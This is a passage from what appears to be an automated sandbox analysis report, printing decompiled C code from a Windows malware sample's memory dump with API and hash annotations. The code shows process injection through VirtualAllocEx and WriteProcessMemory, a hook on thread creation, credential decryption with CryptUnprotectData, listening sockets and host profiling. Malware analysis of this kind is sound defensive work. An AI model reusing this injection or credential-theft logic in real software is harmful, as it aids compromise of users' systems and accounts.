    							if(_t102 > _v12) {
    								goto L55;
    							}
    							__eflags = ( *(_t238 + 2) & 0x0000ffff) + _t238 - _v12;
    							if(( *(_t238 + 2) & 0x0000ffff) + _t238 > _v12) {
    								goto L55;
    							}
    							_v16 = _v16 + 1;
    							continue;
    						}
    						_t234 = _t208;
    						_t140 = E0041816B(_t220, _t208,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)));
    						__eflags = _t140;
    						if(_t140 == 0) {
    							goto L48;
    						}
    						_t141 =  *(_t239 + 0x44);
    						__eflags =  *(_t239 + 0x44);
    						if(__eflags == 0) {
    							L16:
    							_t142 =  *(_t238 + 8) & 0x0000ffff;
    							__eflags = _t142;
    							if(_t142 == 0) {
    								L18:
    								_t143 =  *(_t238 + 0xa) & 0x0000ffff;
    								__eflags = _t143;
    								if(_t143 == 0) {
    									L20:
    									__eflags =  *_t238 & 0x00000010;
    									if(( *_t238 & 0x00000010) == 0) {
    										L31:
    										E00411A74( &_v60,  &_v60, 0, 0x1c);
    										_v60 =  *_t238 & 0x0000ffff;
    										_t209 = _t208 | 0xffffffff;
    										_v56 = E00411E1F(_t208 | 0xffffffff, ( *(_t238 + 4) & 0x0000ffff) + _t238);
    										_t151 =  *(_t238 + 6) & 0x0000ffff;
    										__eflags = _t151;
    										if(_t151 != 0) {
    											__eflags = _t151 + _t238;
    											_v52 = E00411E1F(_t209, _t151 + _t238);
    										} else {
    											_v52 = _v52 & 0x00000000;
    										}
    										_t155 =  *(_t238 + 0xc) & 0x0000ffff;
    										__eflags = _t155;
    										if(_t155 != 0) {
    											__eflags = _t155 + _t238;
    											_v48 = E00411E1F(_t209, _t155 + _t238);
    										} else {
    											_v48 = _v48 & 0x00000000;
    										}
    										_t159 =  *(_t238 + 0xe) & 0x0000ffff;
    										__eflags = _t159;
    										if(_t159 != 0) {
    											__eflags = _t159 + _t238;
    											_v44 = E00411E1F(_t209, _t159 + _t238);
    										} else {
    											_v44 = _v44 & 0x00000000;
    										}
    										_t163 =  *_t238 & 0x0000ffff;
    										__eflags = _t163 & 0x00000003;
    										if((_t163 & 0x00000003) != 0) {
    											E004193CE( *(_t239 + 0x3c),  *(_t239 + 0x38));
    											 *(_t239 + 0x3c) =  *(_t239 + 0x3c) & 0x00000000;
    											_t167 = E00411A14(__eflags,  &_v60, 0x1c);
    											 *(_t239 + 0x38) = _t167;
    											__eflags = _t167;
    											if(_t167 == 0) {
    												E004193A5( &_v60);
    												_t239 = _a4;
    											} else {
    												 *(_t239 + 0x3c) =  *(_t239 + 0x3c) + 1;
    											}
    											goto L55;
    										} else {
    											__eflags = _t163 & 0x0000000c;
    											if(__eflags == 0) {
    												E004193A5( &_v60);
    												L47:
    												_t239 = _a4;
    												goto L48;
    											}
    											_t211 = E0041752D( &_v36, _t234, __eflags,  *((intOrPtr*)(_t239 + 0x40)), _v16, 0x40000000);
    											_v40 = _t211;
    											__eflags = _t211;
    											if(_t211 == 0) {
    												L54:
    												E004119C1(_t211);
    												E004193A5( &_v60);
    												_t239 = _a4;
    												E004193CE( *(_t239 + 0x3c),  *((intOrPtr*)(_a4 + 0x38)));
    												_t122 = _t239 + 0x3c;
    												 *_t122 =  *(_t239 + 0x3c) & 0x00000000;
    												__eflags =  *_t122;
    												goto L55;
    											}
    											_t176 = E00417BFF(_t211, _v36);
    											__eflags = _t176;
    											if(_t176 == 0) {
    												goto L54;
    											}
    											_t177 = E0041194C(( *(_t239 + 0x3c) + 1) * 0x1c, _t239 + 0x38);
    											__eflags = _t177;
    											if(_t177 == 0) {
    												goto L54;
    											}
    											 *(_a4 + 0x3c) =  *(_a4 + 0x3c) + 1;
    											E004119FD( *(_a4 + 0x3c) * 0x1c +  *((intOrPtr*)(_t178 + 0x38)),  &_v60, 0x1c);
    											goto L47;
    										}
    									}
    									__eflags =  *(_t238 + 0xc);
    									if( *(_t238 + 0xc) <= 0) {
    										goto L31;
    									}
    									E004066FC( &_v184, _t220, 1,  &_v288);
    									_t186 = E00412C66( &_v112, ( *(_t238 + 0xc) & 0x0000ffff) + _t238, E004124FE(( *(_t238 + 0xc) & 0x0000ffff) + _t238));
    									__eflags = _t186;
    									if(_t186 == 0) {
    										goto L48;
    									}
    									_t230 =  &_v184;
    									_t212 = 0;
    									__eflags = 0;
    									do {
    										E00411D29( *((intOrPtr*)(_t244 + _t212 - 0x6c)), _t230);
    										_t212 = _t212 + 1;
    										_t230 = _t230 + 4;
    										__eflags = _t212 - 0x10;
    									} while (_t212 < 0x10);
    									_v32 = _v32 | 0xffffffff;
    									_t208 = 0x10;
    									 *_t230 = 0;
    									_v24 = _t208;
    									_v20 = 0x80000001;
    									_t191 = RegOpenKeyExW(0x80000001,  &_v288, 0, 1,  &_v20);
    									__eflags = _t191;
    									if(_t191 != 0) {
    										goto L31;
    									}
    									_t195 = RegQueryValueExW(_v20,  &_v184, 0, 0,  &_v80,  &_v24);
    									__eflags = _t195;
    									if(_t195 == 0) {
    										_v32 = _v24;
    									}
    									RegCloseKey(_v20);
    									__eflags = _v32 - _t208;
    									if(_v32 == _t208) {
    										GetLocalTime( &_v96);
    										__eflags = _v74 - _v96.wDay;
    										if(_v74 != _v96.wDay) {
    											goto L31;
    										}
    										__eflags = _v78 - _v96.wMonth;
    										if(_v78 == _v96.wMonth) {
    											goto L48;
    										}
    									}
    									goto L31;
    								}
    								_t220 = _t238 + _t143;
    								_t201 = E004181A0(_t238 + _t143,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    								__eflags = _t201;
    								if(_t201 == 0) {
    									goto L48;
    								}
    								goto L20;
    							}
    							_t220 = _t238 + _t142;
    							_t202 = E004181A0(_t238 + _t142,  *((intOrPtr*)(_t239 + 0x24)),  *((intOrPtr*)(_t239 + 0x28)));
    							__eflags = _t202 - 1;
    							if(_t202 == 1) {
    								goto L48;
    							}
    							goto L18;
    						}
    						_t203 = E00418426(_t220, _t234, __eflags, 4, _t141,  *((intOrPtr*)(_t239 + 8)),  *((intOrPtr*)(_t239 + 0xc)), _t208);
    						__eflags = _t203;
    						if(_t203 != 0) {
    							goto L48;
    						}
    						goto L16;
    					}
    					goto L55;
    				}
    				return 0;
    			}

    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID:
    • String ID:
    • API String ID:
    • Opcode ID: c83ebaf853cd632bad88ce22480bacf6fa7167e5aa7797a62c9378f9c7b44b24
    • Instruction ID: d450ce691fd4bd393835527052aa282fcca0e3b0a26223f57d92c37f7910a1f1
    • Opcode Fuzzy Hash: c83ebaf853cd632bad88ce22480bacf6fa7167e5aa7797a62c9378f9c7b44b24
    • Instruction Fuzzy Hash: 17B1A071900209AADB10EFA5CD41BFEB7B5BF04344F50451FF951A6691DB38E9C1CB68
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0041631A(void* __eax, void* _a4) {
    				char _v5;
    				signed int _v12;
    				signed int _v16;
    				intOrPtr _v20;
    				long _v24;
    				void* _t37;
    				void* _t42;
    				intOrPtr* _t43;
    				int _t44;
    				long _t46;
    				void* _t47;
    				SIZE_T* _t48;
    				signed int _t50;
    				void* _t52;
    				void* _t54;
    				void* _t55;
    				void* _t60;
    				intOrPtr _t61;
    				intOrPtr _t62;
    				unsigned int _t64;
    
    				_t55 = __eax;
    				_t1 = _t55 + 0x3c; // 0xd8
    				_t60 =  *_t1 + __eax;
    				_t46 =  *(_t60 + 0x50);
    				_v24 = _t46;
    				_v5 = 0;
    				if(IsBadReadPtr(__eax, _t46) == 0) {
    					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
    					_v12 = _t37;
    					__eflags = _t37;
    					if(__eflags == 0) {
    						L17:
    						return _v12;
    					}
    					_t47 = E00411A14(__eflags, _t55, _t46);
    					_t48 = 0;
    					__eflags = _t47;
    					if(_t47 == 0) {
    						L16:
    						VirtualFreeEx(_a4, _v12, 0, 0x8000);
    						_t32 =  &_v12;
    						 *_t32 = _v12 & 0x00000000;
    						__eflags =  *_t32;
    						goto L17;
    					}
    					__eflags =  *(_t60 + 0xa4);
    					if( *(_t60 + 0xa4) <= 0) {
    						L15:
    						E004119C1(_t47);
    						__eflags = _v5;
    						if(_v5 != 0) {
    							goto L17;
    						}
    						goto L16;
    					}
    					_t42 =  *(_t60 + 0xa0);
    					__eflags = _t42;
    					if(_t42 <= 0) {
    						goto L15;
    					}
    					_t61 =  *((intOrPtr*)(_t60 + 0x34));
    					_t54 = _v12 - _t61;
    					_v20 = _t55 - _t61;
    					_t43 = _t42 + _t47;
    					while(1) {
    						__eflags =  *_t43 - _t48;
    						if( *_t43 == _t48) {
    							break;
    						}
    						_t62 =  *((intOrPtr*)(_t43 + 4));
    						__eflags = _t62 - 8;
    						if(_t62 < 8) {
    							L12:
    							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
    							_t48 = 0;
    							__eflags = 0;
    							continue;
    						}
    						_t64 = _t62 + 0xfffffff8 >> 1;
    						__eflags = _t64;
    						_v16 = _t48;
    						if(_t64 == 0) {
    							goto L12;
    						} else {
    							goto L9;
    						}
    						do {
    							L9:
    							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
    							__eflags = _t50;
    							if(_t50 != 0) {
    								_t52 = (_t50 & 0x00000fff) +  *_t43;
    								_t19 = _t52 + _t47;
    								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
    								__eflags =  *_t19;
    							}
    							_v16 = _v16 + 1;
    							__eflags = _v16 - _t64;
    						} while (_v16 < _t64);
    						goto L12;
    					}
    					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
    					__eflags = _t44;
    					_t28 =  &_v5;
    					 *_t28 = _t44 != 0;
    					__eflags =  *_t28;
    					goto L15;
    				}
    				return 0;
    			}

    APIs
    • IsBadReadPtr.KERNEL32(00400000,?,00000000,?,00000000), ref: 00416336
    • VirtualAllocEx.KERNEL32(7519F560,00000000,?,00003000,00000040), ref: 00416354
    • WriteProcessMemory.KERNEL32(7519F560,7519F560,00000000,00000000,00000000,00400000,?), ref: 004163E6
    • VirtualFreeEx.KERNEL32(7519F560,7519F560,00000000,00008000,00400000,?), ref: 0041640B
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Virtual$AllocFreeMemoryProcessReadWrite
    • String ID:
    • API String ID: 1273498236-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000001,00000006), ref: 00414B0C
    • bind.WS2_32(00000000,?,-0000001D), ref: 00414B2C
    • listen.WS2_32(00000000,?), ref: 00414B3B
    • closesocket.WS2_32(00000000), ref: 00414B46
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketlistensocket
    • String ID:
    • API String ID: 952684215-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00408D01(void* __ecx, void* __edx, void* __esi, HANDLE* _a4, long _a8, struct _EXCEPTION_RECORD _a12, void* _a16, struct _EXCEPTION_RECORD _a20, CONTEXT* _a24, struct _PROCESS_PARAMETERS _a28, char _a32) {
    				void _v28;
    				long _v32;
    				intOrPtr _v40;
    				void* __edi;
    				void* _t21;
    				void* _t27;
    				signed int _t30;
    				void* _t34;
    				void* _t35;
    				void* _t38;
    				void* _t40;
    				void* _t42;
    
    				_t42 = __esi;
    				_t38 = __edx;
    				_t35 = __ecx;
    				_t21 = E00406473();
    				_t40 = _a16;
    				if(_t21 != 0 && NtQueryInformationProcess(_t40, 0,  &_v28, 0x18,  &_v32) >= 0 && _v40 != 0 && (_v28 == 0 || E00413036(_v28) == 0)) {
    					_t34 = E00406296(_t35, _t38, _v28);
    					_t51 = _t34;
    					if(_t34 != 0) {
    						_t27 = E00406388(_t35, _t40, _t42, _t51, _t34, 0);
    						if(_t27 != 0) {
    							_t30 = _t27 -  *0x422544 + E00406B06;
    							if(( *0x422530 & 0x00000010) != 0) {
    								_t30 = _t30 ^  *(_a24 + 0xb0);
    							}
    							 *(_a24 + 0xb0) = _t30;
    						}
    						CloseHandle(_t34);
    					}
    				}
    				return NtCreateThread(_a4, _a8, _a12, _t40, _a20, _a24, _a28, _a32);
    			}

    APIs
      • Part of subcall function 00406473: WaitForSingleObject.KERNEL32(00000000,0041D5FF,743C152E,00000002), ref: 0040647B
    • NtQueryInformationProcess.NTDLL(?,00000000,?,00000018,?), ref: 00408D27
    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000), ref: 00408D8E
      • Part of subcall function 00413036: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00413043
      • Part of subcall function 00413036: Thread32First.KERNEL32 ref: 0041305E
      • Part of subcall function 00413036: CloseHandle.KERNEL32(00000000), ref: 0041307F
    • NtCreateThread.NTDLL(?,?,?,?,?,?,?,?), ref: 00408DAA
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseCreateHandle$FirstInformationObjectProcessQuerySingleSnapshotThreadThread32Toolhelp32Wait
    • String ID:
    • API String ID: 3154080929-0
    Uniqueness

    Uniqueness Score: -1.00%

    APIs
    • socket.WS2_32(00000000,00000002,00000011), ref: 00414DEA
    • bind.WS2_32(00000000,00000017,-0000001D), ref: 00414E0A
    • closesocket.WS2_32(00000000), ref: 00414E15
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: bindclosesocketsocket
    • String ID:
    • API String ID: 1873677229-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E0040D161(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
    				char _v5;
    				intOrPtr _v12;
    				intOrPtr _v16;
    				intOrPtr _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v44;
    				signed int _v48;
    				void* _v52;
    				char _v56;
    				char _v72;
    				void* _v96;
    				char _v196;
    				void* __ebx;
    				void* __esi;
    				intOrPtr _t48;
    				intOrPtr _t50;
    				intOrPtr _t52;
    				intOrPtr _t54;
    				signed int _t65;
    				void* _t66;
    				void* _t68;
    				char* _t70;
    				intOrPtr _t77;
    				signed int* _t82;
    				intOrPtr _t95;
    				void* _t97;
    				signed int _t100;
    				void* _t107;
    				void* _t109;
    				intOrPtr _t115;
    				char* _t117;
    				void* _t129;
    
    				_t121 = __eflags;
    				_t115 = _a4;
    				_push(_t115);
    				_t92 = __eax;
    				_t48 = E0040D10E(__eax, __eflags, 0x4c);
    				_push(_t115);
    				_v20 = _t48;
    				_t50 = E0040D10E(_t92, _t121, 0x4f);
    				_push(_t115);
    				_v24 = _t50;
    				_t52 = E0040D10E(_t92, _t121, 0x50);
    				_push(_t115);
    				_v28 = _t52;
    				_t54 = E0040D10E(_t92, _t121, 0x4d);
    				_push(_t115);
    				_v36 = _t54;
    				_v12 = E0040D10E(_t92, _t121, 0x4e);
    				_v5 = _v20 != 0;
    				if(_v5 != 0) {
    					_t95 = _v12;
    					_t65 = E00412510(_t95);
    					if(_t95 != 0 && _t65 > 1) {
    						_t100 = _t65 & 0x80000001;
    						if(_t100 < 0) {
    							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
    						}
    						if(_t129 == 0) {
    							asm("cdq");
    							_v48 = _t65 - _t107 >> 1;
    							_t77 = E00411991(_t65 - _t107 >> 1);
    							_v44 = _t77;
    							if(_t77 != 0) {
    								if(E004121FE(_v12, _t77) != 0) {
    									_t82 =  &_v48;
    									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
    									if(_t82 == 1) {
    										_v16 = E00411D7D(_v52);
    										LocalFree(_v52);
    									}
    								}
    								E004119C1(_v44);
    							}
    						}
    					}
    					_t66 = 0x4b;
    					E00419DD3(_t66,  &_v196);
    					_t117 =  &_v72;
    					_t68 = 0x54;
    					E00419DD3(_t68, _t117);
    					_t70 = 0x403490;
    					_t109 =  ==  ? 0x403490 : _v16;
    					_t97 =  ==  ? 0x403490 : _v36;
    					_t135 = _v32;
    					if(_v32 != 0) {
    						_t70 = _t117;
    					}
    					_push(_t109);
    					_push(_t97);
    					_push(_t70);
    					_push(_v20);
    					E00412742(_a12, E00412510( *_a12),  *_a12, _t135,  &_v196, _a4);
    					_t56 = E004119C1(_v16);
    				}
    				E00417F4F(E00417F4F(E00417F4F(E00417F4F(E00417F4F(_t56, _v20), _v24), _v28), _v36), _v12);
    				return _v5;
    			}

    APIs
    • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 0040D258
    • LocalFree.KERNEL32(?,?,?,?), ref: 0040D274
      • Part of subcall function 004119C1: HeapFree.KERNEL32(00000000,00000000,004131B8,00000000,?,?,?,00405C4E,00000000,00406128), ref: 004119D4
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Free$CryptDataHeapLocalUnprotect
    • String ID:
    • API String ID: 2231100991-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E0041D883(char* __esi) {
    				void* _v40;
    				short _v46;
    				signed char _v48;
    				struct _OSVERSIONINFOW _v324;
    				void* _t13;
    				int _t16;
    				signed int _t20;
    				short _t24;
    				char* _t25;
    
    				_t25 = __esi;
    				E00411A74(_t13, __esi, 0, 6);
    				_v324.dwOSVersionInfoSize = 0x11c;
    				_t16 = GetVersionExW( &_v324);
    				if(_t16 != 0) {
    					__imp__GetNativeSystemInfo( &_v40);
    					 *__esi = E0041D7AD();
    					if(_v48 > 0xff || _v46 != 0) {
    						_t20 = 0;
    					} else {
    						_t20 = _v48 & 0x000000ff;
    					}
    					 *(_t25 + 1) = _t20;
    					asm("sbb eax, eax");
    					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
    					_t24 = _v40;
    					 *((short*)(_t25 + 4)) = _t24;
    					return _t24;
    				}
    				return _t16;
    			}

    APIs
    • GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0041D8A7
    • GetNativeSystemInfo.KERNEL32(?), ref: 0041D8B5
      • Part of subcall function 0041D7AD: GetVersionExW.KERNEL32(?,75144EE0), ref: 0041D7CC
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: Version$InfoNativeSystem
    • String ID:
    • API String ID: 2518960133-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 63%
    			E0040D880() {
    				signed int _v5;
    				void* _v12;
    				signed short* _v16;
    				char _v20;
    				void* _v24;
    				void* _v28;
    				void* _v32;
    				char _v36;
    				char _v40;
    				char _v56;
    				void* _v260;
    				char _v356;
    				char _v460;
    				void* __edi;
    				void* __esi;
    				char* _t52;
    				void* _t53;
    				void* _t55;
    				void* _t65;
    				intOrPtr* _t67;
    				intOrPtr* _t69;
    				intOrPtr* _t71;
    				intOrPtr* _t73;
    				intOrPtr* _t75;
    				intOrPtr* _t77;
    				intOrPtr* _t79;
    				intOrPtr* _t84;
    				intOrPtr* _t86;
    				void* _t87;
    				signed short* _t88;
    				intOrPtr _t96;
    				signed int _t113;
    				intOrPtr* _t117;
    				char* _t119;
    				char* _t121;
    
    				_t52 =  &_v32;
    				_v32 = 0;
    				__imp__CoCreateInstance(0x4015e0, 0, 0x4401, 0x4015c0, _t52);
    				if(_t52 != 0) {
    					L3:
    					_v16 = 0;
    					_t117 = 0;
    					L4:
    					if(_t117 == 0) {
    						return _t52;
    					}
    					_t53 = 0x39;
    					E00419DD3(_t53,  &_v56);
    					_t121 =  &_v40;
    					_t55 = 0x3a;
    					E00419DD3(_t55, _t121);
    					_push(_t121);
    					_push( &_v56);
    					_push(_t117);
    					_v20 = 0;
    					if( *((intOrPtr*)( *_t117 + 0xc))() != 0) {
    						L31:
    						 *((intOrPtr*)( *_t117 + 8))(_t117);
    						_push(0xcc);
    						return E0040C9F4(_t114, _v20, 0x38);
    					}
    					_push( &_v12);
    					_push(_t117);
    					if( *((intOrPtr*)( *_t117 + 0x20))() != 0) {
    						goto L31;
    					}
    					_t65 = 0x3b;
    					E00419DD3(_t65,  &_v356);
    					_t67 = _v12;
    					 *((intOrPtr*)( *_t67 + 0xc))(_t67);
    					_t69 = _v12;
    					_push(_t69);
    					if( *((intOrPtr*)( *_t69 + 0x10))() != 0) {
    						L30:
    						_t71 = _v12;
    						 *((intOrPtr*)( *_t71 + 8))(_t71);
    						goto L31;
    					}
    					_t96 = 0x64;
    					do {
    						_t73 = _v12;
    						_t114 =  &_v28;
    						_push( &_v28);
    						_push(_t73);
    						if( *((intOrPtr*)( *_t73 + 0x14))() != 0) {
    							goto L28;
    						}
    						_t77 = _v28;
    						_t114 =  &_v24;
    						_push( &_v24);
    						_push(0x4015d0);
    						_push(_t77);
    						if( *((intOrPtr*)( *_t77))() != 0) {
    							L27:
    							_t79 = _v28;
    							 *((intOrPtr*)( *_t79 + 8))(_t79);
    							goto L28;
    						}
    						_v5 = 1;
    						while(1) {
    							_push(_v5 & 0x000000ff);
    							_push( &_v356);
    							_t114 = 0x34;
    							_t119 =  &_v460;
    							if(E004126B4( &_v356, _t114, _t119) <= 0) {
    								break;
    							}
    							_t86 = _v24;
    							_t114 = _t119;
    							_v36 = _t96;
    							_t87 =  *((intOrPtr*)( *_t86 + 0xc))(_t86, _t119, 0,  &_v260, _t96,  &_v36);
    							if(_t87 != 0) {
    								if(_t87 == 0x7a || _t87 == 1) {
    									L25:
    									_v5 = _v5 + 1;
    									if(_v5 <= _t96) {
    										continue;
    									}
    								}
    								break;
    							}
    							_t88 =  &_v260;
    							if(_v260 == 0) {
    								L18:
    								if( *_t88 != 0x40) {
    									_t88 = 0;
    								}
    								L20:
    								if(_t88 != 0 && E00411DB5( &_v260 | 0xffffffff,  &_v20,  &_v260) != 0) {
    									E00411DB5(1,  &_v20, 0x40348c);
    								}
    								goto L25;
    							}
    							_t113 = _v260 & 0x0000ffff;
    							while(_t113 != 0x40) {
    								_t88 =  &(_t88[1]);
    								_t113 =  *_t88 & 0x0000ffff;
    								if(_t113 != 0) {
    									continue;
    								}
    								goto L18;
    							}
    							goto L20;
    						}
    						_t84 = _v24;
    						 *((intOrPtr*)( *_t84 + 8))(_t84);
    						goto L27;
    						L28:
    						_t75 = _v12;
    						_push(_t75);
    					} while ( *((intOrPtr*)( *_t75 + 0x10))() == 0);
    					_t117 = _v16;
    					goto L30;
    				}
    				_t117 = _v32;
    				if(_t117 == 0) {
    					goto L3;
    				} else {
    					_v16 = _t117;
    					goto L4;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(004015E0,00000000,00004401,004015C0,?,?,00000000,00000001), ref: 0040D8A5
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: CreateInstance
    • String ID:
    • API String ID: 542301482-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E0040C68A(signed short* __eax, void* __ecx) {
    				signed int _v8;
    				void* __esi;
    				signed int* _t7;
    				void* _t8;
    				signed short* _t9;
    				signed int _t10;
    				signed int _t13;
    				signed short _t14;
    				void* _t15;
    
    				_t16 = __eax;
    				_t7 =  &_v8;
    				_v8 = 0x104;
    				__imp__GetUserNameExW(2, __eax, _t7, _t15, __ecx);
    				if(_t7 == 0) {
    					L8:
    					_t8 = 6;
    					_t9 = E00419DD3(_t8, _t16);
    				} else {
    					_t10 = _v8;
    					if(_t10 == 0) {
    						goto L8;
    					} else {
    						 *((short*)(__eax + _t10 * 2)) = 0;
    						_t9 = __eax;
    						if( *((intOrPtr*)(__eax)) != 0) {
    							do {
    								_t13 =  *_t9 & 0x0000ffff;
    								if(_t13 == 0x2f || _t13 == 0x5c) {
    									_t14 = 0x7c;
    									 *_t9 = _t14;
    								}
    								_t9 =  &(_t9[1]);
    							} while ( *_t9 != 0);
    						}
    					}
    				}
    				return _t9;
    			}

    APIs
    • GetUserNameExW.SECUR32(00000002,?,00000001,?,?,?,0040C7E1,?,?,00000000), ref: 0040C69F
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: NameUser
    • String ID:
    • API String ID: 2645101109-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00411AEB() {
    				long _t7;
    				signed int _t8;
    				intOrPtr _t9;
    				void* _t11;
    				void* _t13;
    
    				_t11 = _t13 - 0x78;
    				_t7 = GetTimeZoneInformation(_t11 - 0x34);
    				if(_t7 != 1) {
    					if(_t7 != 2) {
    						_t8 = 0;
    					} else {
    						_t9 =  *((intOrPtr*)(_t11 + 0x74));
    						goto L4;
    					}
    				} else {
    					_t9 =  *((intOrPtr*)(_t11 + 0x20));
    					L4:
    					_t8 = (_t9 +  *(_t11 - 0x34)) * 0xffffffc4;
    				}
    				return _t8;
    			}

    APIs
    • GetTimeZoneInformation.KERNEL32(?), ref: 00411AFA
    Memory Dump Source
    • Source File: 00000000.00000002.229888616.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.229884120.0000000000400000.00000002.00020000.sdmp
    • Associated: 00000000.00000002.229910066.0000000000422000.00000004.00020000.sdmp
    • Associated: 00000000.00000002.229916063.0000000000425000.00000002.00020000.sdmp
    Similarity
    • API ID: InformationTimeZone
    • String ID:
    • API String ID: 565725191-0
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00412B72() {
    				signed int _t23;
    				signed int _t59;
    				signed int* _t63;
    				signed int _t64;
    
    				_t23 =  *0x423c60;
    				if(_t23 >= 0x270) {
    					_t64 = 0;
    					do {
    						_t59 = _t64;
    						_t64 = _t64 + 1;
    						0x423290[_t59] = (( *(0x423294 + _t59 * 4) ^ 0x423290[_t59]) & 0x7fffffff ^ 0x423290[_t59]) >> 0x00000001 ^  *(0x422000 + ((( *(0x423294 + _t59 * 4) ^ 0x423290[_t59]) & 0x7fffffff ^ 0x423290[_t59]) & 0x00000001) * 4) ^  *(0x4238c4 + _t59 * 4);
    					} while (_t64 < 0xe3);
    					if(_t64 < 0x26f) {
    						_t63 =  &(0x423290[_t64]);
    						do {
    							 *_t63 =  *(0x422000 + ((( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) & 0x00000001) * 4) ^  *(_t63 - 0x38c) ^ (( *_t63 ^ _t63[1]) & 0x7fffffff ^  *_t63) >> 0x00000001;
    							_t63 =  &(_t63[1]);
    						} while (_t63 < 0x423c4c);
    					}
    					 *0x423c4c = (( *0x423290 ^  *0x423c4c) & 0x7fffffff ^  *0x423c4c) >> 0x00000001 ^  *(0x422000 + ((( *0x423290 ^  *0x423c4c) & 0x7fffffff ^  *0x423c4c) & 0x00000001) * 4) ^  *0x4238c0;
    					_t23 = 0;
    				}
    				 *0x423c60 = _t23 + 1;
